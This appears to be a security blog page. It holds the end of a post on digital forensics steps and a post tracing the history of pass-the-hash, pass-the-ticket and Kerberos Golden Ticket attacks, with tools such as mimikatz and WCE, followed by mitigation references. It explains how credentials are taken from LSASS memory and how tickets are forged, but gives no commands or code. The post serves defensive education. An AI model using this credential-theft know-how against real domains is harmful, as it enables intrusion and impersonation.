Media and Artifact Analysis: In this step that you will be overwhelmed with the amount of information that you could be looking at.  You should be able to answer questions such as what programs were executed, which files were downloaded, which files were clicked on, witch directories were opened, which files were deleted, where did the user browsed to and many others. One technique used in order to reduce the data set is to identify files known to be good and the ones that are known to be bad. This is done using databases like the Nation Software Reference Library from NIST and hash comparisons using tools like hfind from the Sleuth Kit.  In case you are analyzing a Windows system you can create a super timeline. The super timeline will incorporate multiple time sources into a single file. You must have knowledge of file systems, windows artifacts and registry artifacts to take advantage of this technique that will reduce the amount of data to be analyzed. Other things that you will be looking is evidence of account usage, browser usage, file downloads, file opening/creation, program execution, usb key usage. Memory analysis is another key analysis step in order to examine rogue processes, network connections, loaded DLLs, evidence of code injection, process paths, user handles, mutex and many others. Beware of anti-forensic techniques such as steganography or data alteration and destruction, that will impact your investigation analysis and conclusions

String or Byte search: This step will consist into using tools that will search the low level raw images. If you know what you are looking then you can use this method to find it. Is this step that you use tools and techniques that will look for byte signatures of know files known as the magic cookies. It is also in this step that you do string searches using regular expressions. The strings or byte signatures that you will be looking for are the ones that are relevant to the case you are dealing with.

Data Recovery: This is the step that you will be looking at recover data from the file system. Some of the tools that will help in this step are the ones available in the Sleuth Kit that can be used to analyze the file system, data layer and metadata layer.  Analyzing the slack space, unallocated space and in-depth file system analysis is part of this step  in order to find files of interest. Carving files from the raw images based on file headers using tools like foremost is another technique to further gather evidence.

Reporting Results: The final phase involves reporting the results of the analysis, which may include describing the actions performed, determining what other actions need to be performed, and recommending improvements to policies, guidelines, procedures, tools, and other aspects of the forensic process. Reporting the results is a key part of any investigation. Consider writing in a way that reflects the usage of scientific methods and facts that you can prove. Adapt the reporting style depending on the audience and be prepared for the report to be used as evidence for legal or administrative purposes.

 

References and further reading:

SANS 508 – Advanced Computer Forensics and Incident Response
Guide to Integrating Forensic Techniques into Incident Response
  (pub. #: 800-86), 2006, US NIST
Computer Security Incident Handling Guide (pub. #: 800-61), 2004, US NIST
The ComplexWorld of Corporate CyberForensics Investigations by Gregory Leibolt

 

Tagged , , , , , , ,

The path to the Golden Ticket

goldenticketLateral movement is one of the tactics used during an attack and is normally successfully due to some kind of credential theft that has happened at some point in time during the course of the attack. In order to materialize this  tactic there is a technique called pass-the-hash that has been used for long time. This was initially discovered by Paul Aston in 1997 on Unix SAMBA but became more mainstream in 2000 when Hernan Ochoa released a paper “Modifying Windows NT Logon Credential”. This technique evolved and it became very popular in 2007 when he released the Pass the Hash toolkit. This tool brought the pass-the-hash technique  mainstream because it could be easily executed on Windows systems. In the same year, Marcus Murray from TrueSec presented another tool during TechED that could leverage this same attack technique. Soon after that Ivan Bütler from Compass Security made an interesting paper about it. Also in the same year Benjamin Delpy `gentilkiwi` a French security researcher – less know at the time – released a tool called mimikatz.

The pass the hash attack takes advantage of cached credentials stored in the system which are used to authenticate to other resources in the network. Details are well explained by Skp Duckwall and Chris Campbell on their BlackHat 2013 paper “Microsoft has a credential problem” describing the issues that Microsoft has with credentials due to single sign on solutions that are in place which also affects smartcards For convenience and to improve customer experience, Microsoft behind the scenes implements different methods that allow a user to only type its username and password once. This permits the user to login into SharePoint, network shares, read email, etc without needed to constantly provide its credentials avoiding Mark Russinovich “credential fatigue” problem.  Outcome of this convenience is that credentials are cached. Meaning that using these type of technique,  the attacker with local admin or system privileges is able to retrieve the credentials from the process memory (LSASS) in a hash representation.  There are other places in storage where the credentials could be retrieved like the SAM database in a standalone environment or from the NTDS.dit file in an Active Directory domain. Then those password representations could be reused to spread across the network and increase attacker foothold. The usage of the some of the aforementioned tools are illustrated on SANS reading room on a paper from Bashar Ewaida.

Time has passed and in 2011 Hernan Ochoa strikes again by releasing a the evolution of the pass the hash toolkit into a new tool called Windows Credential Editor (WCE) which executes on 32bits and 64bits windows systems and can dump the NTLM/LM hashes of the credentials cached in the system by injecting into LSASS process or just by reading memory. The novelty was that  this tool introduced a new technique called pass the ticket which is the equivalent to the pass the hash but applied to the Kerberos tickets instead of NTLM/LM hashes. This technique is interesting because it can escalate the privileges on the attacker without cached credentials on the machine. Instead it can request Kerberos tickets that could be used for a period of 10 hours and be injected into an attacker session.

Also in 2011, Benjamin Delpy was able to demonstrate that not only password representations could be retrieved from memory but also the clear text passwords by taking advantage on how the credential provided for digest authentication works in Windows. For example If one user tries to authenticate to a website using the digest authentication method using a web browser it sends a computed hash trough the network. However, in order to compute this hash the digest credential provider (wdigest.dll) uses 3 elements and one is the password which means it needs to be stored in memory in order to be used.  Since then Benjamim has been further developing his research and mimikatz 2.0 is the last version of the tool focusing on Windows 2008R2 and 8.1. The tool has also been incorporated into Metasploit framework and it can also work offline by reading the LSASS memory dump that you can retrieve using process dump. This method was even incorporated as a plug-in of the memory forensics tool Volatility.

But Benjamim went even further with his research and he pleased the security community with the implementation of another novel technique that uses kerberos tickets to impersonate any user in the domain and defeat the 10 hours lifespan. This technique is known as the Golden Ticket (counterfeit Kerberos ticket) and takes advantage on the way Microsoft Kerberos implementation works and how it relies on the KRBTGT account. The secret key used to sign all Kerberos TGTs is the KRBTGT hash. This technique permits creating a valid Kerberos ticket that allows impersonation of any user in the Active Directory domain. If you have some time try the tool –   “The tool is great and It can extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets”

Why can’t Microsoft patch this problem? This works as designed and relies on current trust models. If you are logged in then the system has your credentials stored in memory to be used across the different credential providers to perform actions on behalf of the user and to facilitate single sign on. However, In order to mitigate the risk of this attack scenario, Microsoft created a taskforce called Pass the Hash workgroup that was mandated to identify tools, policies, best practices that companies could use to reduce the exposure to this attack. One of the outcomes of this taskforce were ways to mitigate the exposure to this attack that include restrict and protect high privileged credentials, restrict local accounts with administrative privileges and restrict inbound traffic on the host firewall. This and other recommendations are greatly explained in more detail in the white paper  “Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft Techniques.

Many experts believe that a well-resourced and determined adversary will usually be successfully in attacking systems, even if the target has invested in its defensive posture. In case you might have been compromised and you were able to contain the damage, here are some recommendations on how to restore the active directory service to its state before the attack. Of course everyone wants to avoid these scenarios. One defense strategy that we (defense side) have is to continually increase the costs associated to executing the attack. The National Security Agency/Central Security Service. Information. Assurance. Directorate released a paper “Reducing the Effectiveness of Pass-the-Hash” that helps mitigates the exposure to this type of attack. The Computer Emergency Response Team (CERT-EU) for the EU institutions just released a white paper “Protection from Kerberos Golden Ticket” that contains good recommendations as well.

Tagged , , , , , , , ,